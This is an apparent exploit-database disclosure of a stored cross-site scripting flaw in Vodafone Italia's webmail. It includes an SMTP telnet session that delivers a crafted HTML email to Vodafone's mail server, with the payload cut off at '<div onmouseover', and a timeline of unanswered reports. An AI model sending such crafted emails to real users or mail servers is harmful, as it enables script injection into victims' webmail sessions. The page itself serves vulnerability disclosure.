Vodafone Italia Webmail Cross Site Scripting

Vodafone Italia's webmail system suffers from a cross site scripting vulnerability that can be leveraged via an incoming email.

MD5 | d0d7db3a1272f4db6715ac4f88d6f69f

# Title: Vodafone Webmail - Stored Cross-Site Scripting
# Date: 2017-07-14
# Exploit Author: theMiddle / https://github.com/theMiddleBlue
# Website: https://web.mail.vodafone.it

1. Description
the Vodafone Italia webmail (web.mail.vodafone.it) suffers from a
stored cross-site scripting vulnerability. The XSS-Filters can be eluded,
and the vulnerability can be exploited, by sending an e-mail message with
a specific format that will be shown below.

After years of no-answer from Vodafone, I decided to disclose it in order
to alert users and companies that use this webmail.

2. Exploit vulnerability
# telnet mx.vodafone.arubamail.it 25
Connected to mx.vodafone.arubamail.it.
Escape character is '^]'.
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready
HELO example.com
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you
MAIL FROM: [email protected]
250 2.1.0 <[email protected]> sender ok
RCPT TO: *****@vodafone.it
250 2.1.5 <*****@vodafone.it> recipient ok
354 enter mail, end with "." on a line by itself
Subject: test xss
From: theMiddle <[email protected]>
To: *****@vodafone.it
Content-Type: text/html; charset=utf-8

<div onmouseover

250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection
Connection closed by foreign host.

A screenshot of the executed javascript on Chrome Browser:

3. Timeline
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).
2015-06-25: Second contact via social network (no answer received).
2017-07-13: Third e-mail to [email protected] (no answer received).
2017-07-14: Disclosure.

Related Posts